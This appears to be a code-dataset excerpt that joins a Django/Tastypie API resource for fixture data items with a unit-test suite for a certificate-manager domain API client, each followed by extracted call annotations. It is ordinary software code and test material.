                            readonly=True, unique=True)
    # when null, that means the ref'd fixture type was not found
    fixture_type = tp_f.CharField(attribute='fixture_type', readonly=True,
                                  null=True)
    id = tp_f.CharField(attribute='_id', readonly=True, unique=True)

    def obj_get(self, bundle, **kwargs):
        return convert_fdt(get_object_or_not_exist(
            FixtureDataItem, kwargs['pk'], kwargs['domain']))

    def obj_get_list(self, bundle, **kwargs):
        domain = kwargs['domain']
        parent_id = bundle.request.GET.get("parent_id", None)
        parent_ref_name = bundle.request.GET.get("parent_ref_name", None)
        references = bundle.request.GET.get("references", None)
        child_type = bundle.request.GET.get("child_type", None)
        type_id = bundle.request.GET.get("fixture_type_id", None)
        type_tag = bundle.request.GET.get("fixture_type", None)

        if parent_id and parent_ref_name and child_type and references:
            parent_fdi = FixtureDataItem.get(parent_id)
            fdis = list(
                FixtureDataItem.by_field_value(
                    domain, child_type, parent_ref_name,
                    parent_fdi.fields_without_attributes[references])
            )
        elif type_id or type_tag:
            type_id = type_id or FixtureDataType.by_domain_tag(
                domain, type_tag).one()
            fdis = list(FixtureDataItem.by_data_type(domain, type_id))
        else:
            fdis = list(FixtureDataItem.by_domain(domain))

        return [convert_fdt(fdi) for fdi in fdis] or []

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.edit_apps)
        object_class = FixtureDataItem
        resource_name = 'fixture'
        limit = 0
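A hedged illustration of the query parameters `obj_get_list` reads (not part of the original file). The base URL is a placeholder — the real path depends on how CommCare HQ mounts this Tastypie resource and on authentication — but the parameter names come directly from the code above.

import requests

BASE = 'https://example-hq.test/a/demo-domain/api/fixture/'  # placeholder URL

# Filter fixture items by their type tag (the type_tag branch above)
by_type = requests.get(BASE, params={'fixture_type': 'city'})

# Look up child items of a parent fixture item
# (the parent_id / parent_ref_name / references / child_type branch above)
children = requests.get(BASE, params={
    'parent_id': 'abc123',
    'parent_ref_name': 'city_id',
    'references': 'id',
    'child_type': 'district',
})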
[((24, 13, 25, 55), 'tastypie.fields.DictField', 'tp_f.DictField', (), '', True, 'from tastypie import fields as tp_f\n'), ((27, 19, 28, 44), 'tastypie.fields.CharField', 'tp_f.CharField', (), '', True, 'from tastypie import fields as tp_f\n'), ((29, 9, 29, 68), 'tastypie.fields.CharField', 'tp_f.CharField', (), '', True, 'from tastypie import fields as tp_f\n'), ((15, 14, 15, 51), 'corehq.apps.fixtures.models.FixtureDataType.get', 'FixtureDataType.get', ({(15, 34, 15, 50): 'fdi.data_type_id'}, {}), '(fdi.data_type_id)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((61, 25, 61, 79), 'corehq.apps.api.resources.v0_1.RequirePermissionAuthentication', 'RequirePermissionAuthentication', ({(61, 57, 61, 78): 'Permissions.edit_apps'}, {}), '(Permissions.edit_apps)', False, 'from corehq.apps.api.resources.v0_1 import CustomResourceMeta, RequirePermissionAuthentication\n'), ((32, 27, 33, 60), 'corehq.apps.api.util.get_object_or_not_exist', 'get_object_or_not_exist', ({(33, 12, 33, 27): 'FixtureDataItem', (33, 29, 33, 41): "kwargs['pk']", (33, 43, 33, 59): "kwargs['domain']"}, {}), "(FixtureDataItem, kwargs['pk'], kwargs['domain'])", False, 'from corehq.apps.api.util import get_object_or_not_exist\n'), ((45, 25, 45, 55), 'corehq.apps.fixtures.models.FixtureDataItem.get', 'FixtureDataItem.get', ({(45, 45, 45, 54): 'parent_id'}, {}), '(parent_id)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((47, 16, 49, 69), 'corehq.apps.fixtures.models.FixtureDataItem.by_field_value', 'FixtureDataItem.by_field_value', ({(48, 20, 48, 26): 'domain', (48, 28, 48, 38): 'child_type', (48, 40, 48, 55): 'parent_ref_name', (49, 20, 49, 68): 'parent_fdi.fields_without_attributes[references]'}, {}), '(domain, child_type, parent_ref_name,\n parent_fdi.fields_without_attributes[references])', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((54, 24, 54, 69), 'corehq.apps.fixtures.models.FixtureDataItem.by_data_type', 'FixtureDataItem.by_data_type', ({(54, 53, 54, 59): 'domain', (54, 61, 54, 68): 'type_id'}, {}), '(domain, type_id)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((56, 24, 56, 57), 'corehq.apps.fixtures.models.FixtureDataItem.by_domain', 'FixtureDataItem.by_domain', ({(56, 50, 56, 56): 'domain'}, {}), '(domain)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((52, 33, 53, 33), 'corehq.apps.fixtures.models.FixtureDataType.by_domain_tag', 'FixtureDataType.by_domain_tag', ({(53, 16, 53, 22): 'domain', (53, 24, 53, 32): 'type_tag'}, {}), '(domain, type_tag)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n')]
broadinstitute/cert_manager_api
tests/test_domain.py
3a9c3445ff32ecd29ab47e7a049c47155b72614a
# -*- coding: utf-8 -*- """Define the cert_manager.domain.Domain unit tests.""" # Don't warn about things that happen as that is part of unit testing # pylint: disable=protected-access # pylint: disable=no-member import json from requests.exceptions import HTTPError from testtools import TestCase import responses from cert_manager.domain import Domain, DomainCreationResponseError from .lib.testbase import ClientFixture class TestDomain(TestCase): # pylint: disable=too-few-public-methods """Serve as a Base class for all tests of the Domain class.""" def setUp(self): # pylint: disable=invalid-name """Initialize the class.""" # Call the inherited setUp method super().setUp() # Make sure the Client fixture is created and setup self.cfixt = self.useFixture(ClientFixture()) self.client = self.cfixt.client self.api_url = f"{self.cfixt.base_url}/domain/v1" # Setup a test response one would expect normally self.valid_response = [ {"id": 1234, "name": "example.com"}, {"id": 4321, "name": "*.example.com"}, {"id": 4322, "name": "subdomain.example.com"}, ] # Setup a test response for getting a specific Domain self.valid_individual_response = self.valid_response[0] self.valid_individual_response["status"] = "Active" # Setup JSON to return in an error self.error_response = {"description": "domain error"} class TestInit(TestDomain): """Test the class initializer.""" @responses.activate def test_param(self): """The URL should change if api_version is passed as a parameter.""" # Set a new version version = "v3" api_url = f"{self.cfixt.base_url}/domain/{version}" # Setup the mocked response responses.add(responses.GET, api_url, json=self.valid_response, status=200) domain = Domain(client=self.client, api_version=version) data = domain.all() # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, api_url) self.assertEqual(data, self.valid_response) def test_need_client(self): """The class should raise an exception without a client parameter.""" self.assertRaises(TypeError, Domain) class TestAll(TestDomain): """Test the .all method.""" @responses.activate def test_cached(self): """The function should return all the data, but should not query the API twice.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response, status=200) domain = Domain(client=self.client) data = domain.all() data = domain.all() # Verify all the query information # There should only be one call the first time "all" is called. # Due to pagination, this is only guaranteed as long as the number of # entries returned is less than the page size self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, self.api_url) self.assertEqual(data, self.valid_response) @responses.activate def test_forced(self): """The function should return all the data, but should query the API twice.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response, status=200) domain = Domain(client=self.client) data = domain.all() data = domain.all(force=True) # Verify all the query information # There should only be one call the first time "all" is called. 
# Due to pagination, this is only guaranteed as long as the number of # entries returned is less than the page size self.assertEqual(len(responses.calls), 2) self.assertEqual(responses.calls[0].request.url, self.api_url) self.assertEqual(responses.calls[1].request.url, self.api_url) self.assertEqual(data, self.valid_response) @responses.activate def test_bad_http(self): """The function should raise an HTTPError exception if domains cannot be retrieved from the API.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.error_response, status=400) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.all) # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, self.api_url) class TestFind(TestDomain): """Test the .find method.""" @responses.activate def test_no_params(self): """Without parameters, the method will return all domains""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response, status=200) domain = Domain(client=self.client) data = domain.find() self.assertEqual(data, self.valid_response) @responses.activate def test_params(self): """Parameters will be passed to API""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200) api_url = f"{self.api_url}?name=example.com" domain = Domain(client=self.client) data = domain.find(name="example.com") # Verify all the query information self.assertEqual(responses.calls[0].request.url, api_url) self.assertEqual(data, self.valid_response[0]) @responses.activate def test_bad_http(self): """The function should raise an HTTPError exception if domains cannot be retrieved from the API.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.error_response, status=400) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.find) # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, self.api_url) class TestCount(TestDomain): """Test the .count method.""" @responses.activate def test_no_params(self): """Without parameters, the method will count all domains""" # Setup the mocked response count = {"count": len(self.valid_response)} api_url = f"{self.api_url}/count" responses.add(responses.GET, api_url, json=count, status=200) domain = Domain(client=self.client) data = domain.count() self.assertEqual(data, count) self.assertEqual(responses.calls[0].request.url, api_url) @responses.activate def test_params(self): """Parameters will be passed to API""" # Setup the mocked response count = {"count": len(self.valid_response[0])} api_url = f"{self.api_url}/count" responses.add(responses.GET, api_url, json=count, status=200) domain = Domain(client=self.client) data = domain.count(name="example.com") # Verify all the query information self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com") self.assertEqual(data, count) @responses.activate def test_bad_http(self): """The function should raise an HTTPError exception if counts cannot be retrieved from the API.""" # Setup the mocked response api_url = f"{self.api_url}/count" responses.add(responses.GET, api_url, json=self.error_response, status=400) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.count) # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, api_url) class 
TestGet(TestDomain): """Test the .get method.""" @responses.activate def test_need_domain_id(self): """The function should raise an exception without an domain_id parameter.""" domain = Domain(client=self.client) self.assertRaises(TypeError, domain.get) @responses.activate def test_domain_id(self): """The function should return data about the specified Domain ID.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200) domain = Domain(client=self.client) data = domain.get(domain_id) self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, api_url) self.assertEqual(data, self.valid_individual_response) @responses.activate def test_ne_domain_id(self): """The function should raise an HTTPError exception if the specified Domain ID does not exist.""" domain_id = 2345 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.GET, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.get, domain_id) class TestCreate(TestDomain): """Test the .create method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # Not going to check every permutation of missing parameters, # but verify that something is required self.assertRaises(TypeError, domain.create) @responses.activate def test_create_success(self): """ The function should return the created domain ID, as well as add all parameters to the request body """ # Setup the mocked response domain_id = 1234 org_id = 4321 types = ["SSL"] location = f"{self.api_url}/{str(domain_id)}" responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201) domain = Domain(client=self.client) post_data = { "name": "sub2.example.com", "delegations": [{"orgId": org_id, "certTypes": types}] } response = domain.create("sub2.example.com", org_id, types) self.assertEqual(response, {"id": domain_id}) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_create_success_optional_params(self): """ The function should return the created domain ID when additional params are specified, as well add the non-required parameters to the request body """ # Setup the mocked response domain_id = 1234 location = f"{self.api_url}/{str(domain_id)}" responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201) domain = Domain(client=self.client) post_data = { "name": "sub2.example.com", "delegations": [{"orgId": 4321, "certTypes": ["SSL"]}], "description": "Example sub domain" } response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain") self.assertEqual(response, {"id": domain_id}) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_create_failure_http_error(self): """ The function should return an error code and description if the Domain creation failed. 
""" # Setup the mocked response responses.add(responses.POST, self.api_url, json=self.error_response, status=400) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["other"] } self.assertRaises(ValueError, domain.create, **create_args) @responses.activate def test_create_failure_http_status_unexpected(self): """ The function should return an error code and description if the Domain creation failed with DomainCreationResponseError (unexpected HTTP status code). """ # Setup the mocked response responses.add(responses.POST, self.api_url, json=self.error_response, status=200) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["SSL"] } self.assertRaises(DomainCreationResponseError, domain.create, **create_args) @responses.activate def test_create_failure_missing_location_header(self): """ The function should return an error code and description if the Domain creation failed with DomainCreationResponseError (no Location header in response). """ # Setup the mocked response responses.add(responses.POST, self.api_url, status=201) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["SSL"] } self.assertRaises(DomainCreationResponseError, domain.create, **create_args) @responses.activate def test_create_failure_domain_id_not_found(self): """ The function should return an error code and description if the Domain creation failed with DomainCreationResponseError (Domain ID not found in response). """ # Setup the mocked response responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["SSL"] } self.assertRaises(DomainCreationResponseError, domain.create, **create_args) class TestDelete(TestDomain): """Test the .delete method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.delete) @responses.activate def test_delete_success(self): """The function should return True if the deletion succeeded.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.DELETE, api_url, status=200) domain = Domain(client=self.client) response = domain.delete(domain_id) self.assertEqual(True, response) @responses.activate def test_delete_failure_http_error(self): """ The function should raise an HTTPError exception if the deletion failed. """ domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.DELETE, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.delete, domain_id) class TestActivate(TestDomain): """Test the .activate method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. 
""" domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.activate) @responses.activate def test_activate_success(self): """The function should return True if the activation succeeded.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/activate" # Setup the mocked response responses.add(responses.PUT, api_url, status=200) domain = Domain(client=self.client) response = domain.activate(domain_id) self.assertEqual(True, response) @responses.activate def test_activate_failure_http_error(self): """ The function should raise an HTTPError exception if the deletion failed. """ domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/activate" # Setup the mocked response responses.add(responses.PUT, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.activate, domain_id) class TestSuspend(TestDomain): """Test the .suspend method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.suspend) @responses.activate def test_suspend_success(self): """The function should return True if the suspension succeeded.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/suspend" # Setup the mocked response responses.add(responses.PUT, api_url, status=200) domain = Domain(client=self.client) response = domain.suspend(domain_id) self.assertEqual(True, response) @responses.activate def test_suspend_failure_http_error(self): """ The function should raise an HTTPError exception if the suspension failed. """ domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/suspend" # Setup the mocked response responses.add(responses.PUT, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.suspend, domain_id) class TestDelegate(TestDomain): """Test the .delegate method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.delegate) @responses.activate def test_delegate_success(self): """The function should return True if the delegation succeeded.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.POST, api_url, status=200) domain = Domain(client=self.client) response = domain.delegate(domain_id, org_id, types) post_data = { "orgId": org_id, "certTypes": types } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_delegate_failure_http_error(self): """The function should raise an HTTPError exception if the delegation failed.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.POST, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types) class TestRemoveDelegation(TestDomain): """Test the .remove_delegation method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. 
""" domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.remove_delegation) @responses.activate def test_remove_delegation_success(self): """The function should return True if the delegation removal succeeded.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.DELETE, api_url, status=200) domain = Domain(client=self.client) response = domain.remove_delegation(domain_id, org_id, types) post_data = { "orgId": org_id, "certTypes": types } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_remove_delegation_failure_http_error(self): """The function should raise an HTTPError exception if the delegation removal failed.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.DELETE, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types) class TestApproveDelegation(TestDomain): """Test the .approve_delegation method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.approve_delegation) @responses.activate def test_approve_delegation_success(self): """The function should return True if the approval succeeded.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve" # Setup the mocked response responses.add(responses.POST, api_url, status=200) domain = Domain(client=self.client) response = domain.approve_delegation(domain_id, org_id) post_data = { "orgId": org_id, } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_approval_failure_http_error(self): """The function should raise an HTTPError exception if the approval failed.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve" # Setup the mocked response responses.add(responses.POST, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id) class TestRejectDelegation(TestDomain): """Test the .reject_delegation method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. 
""" domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.reject_delegation) @responses.activate def test_reject_delegation_success(self): """The function should return True if the rejection succeeded.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject" # Setup the mocked response responses.add(responses.POST, api_url, status=200) domain = Domain(client=self.client) response = domain.reject_delegation(domain_id, org_id) post_data = { "orgId": org_id, } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_reject_failure_http_error(self): """The function should raise an HTTPError exception if the rejection failed.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject" # Setup the mocked response responses.add(responses.POST, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
[((59, 8, 59, 83), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((61, 17, 61, 64), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((82, 8, 82, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((84, 17, 84, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((100, 8, 100, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((102, 17, 102, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((119, 8, 119, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((121, 17, 121, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((136, 8, 136, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((138, 17, 138, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((147, 8, 147, 91), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((150, 17, 150, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((162, 8, 162, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((164, 17, 164, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((181, 8, 181, 69), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((183, 17, 183, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((195, 8, 195, 69), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((197, 17, 197, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((209, 8, 209, 83), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((211, 17, 211, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((226, 17, 226, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((237, 8, 237, 94), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((239, 17, 239, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((254, 8, 254, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((256, 17, 256, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((270, 17, 270, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((287, 8, 287, 95), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((289, 17, 289, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((309, 8, 309, 95), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((311, 17, 311, 43), 
'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((330, 8, 331, 33), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((333, 17, 333, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((351, 8, 352, 33), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((354, 17, 354, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((372, 8, 372, 63), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((374, 17, 374, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((392, 8, 392, 98), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((394, 17, 394, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((414, 17, 414, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((426, 8, 426, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((428, 17, 428, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((444, 8, 444, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((446, 17, 446, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((461, 17, 461, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((473, 8, 473, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((475, 17, 475, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((491, 8, 491, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((493, 17, 493, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((508, 17, 508, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((520, 8, 520, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((522, 17, 522, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((538, 8, 538, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((540, 17, 540, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((555, 17, 555, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((569, 8, 569, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((571, 17, 571, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((591, 8, 591, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((593, 17, 593, 43), 'cert_manager.domain.Domain', 'Domain', (), '', 
False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((608, 17, 608, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((622, 8, 622, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((624, 17, 624, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((644, 8, 644, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((646, 17, 646, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((661, 17, 661, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((674, 8, 674, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((676, 17, 676, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((694, 8, 694, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((696, 17, 696, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((711, 17, 711, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((724, 8, 724, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((726, 17, 726, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((744, 8, 744, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((746, 17, 746, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((297, 58, 297, 79), 'json.dumps', 'json.dumps', ({(297, 69, 297, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((320, 58, 320, 79), 'json.dumps', 'json.dumps', ({(320, 69, 320, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((579, 58, 579, 79), 'json.dumps', 'json.dumps', ({(579, 69, 579, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((632, 58, 632, 79), 'json.dumps', 'json.dumps', ({(632, 69, 632, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((683, 58, 683, 79), 'json.dumps', 'json.dumps', ({(683, 69, 683, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n'), ((733, 58, 733, 79), 'json.dumps', 'json.dumps', ({(733, 69, 733, 78): 'post_data'}, {}), '(post_data)', False, 'import json\n')]
ProtKsen/pgame
texts.py
c4455c6c07eaf275f9fcfa661cd6933ee7b1ff92
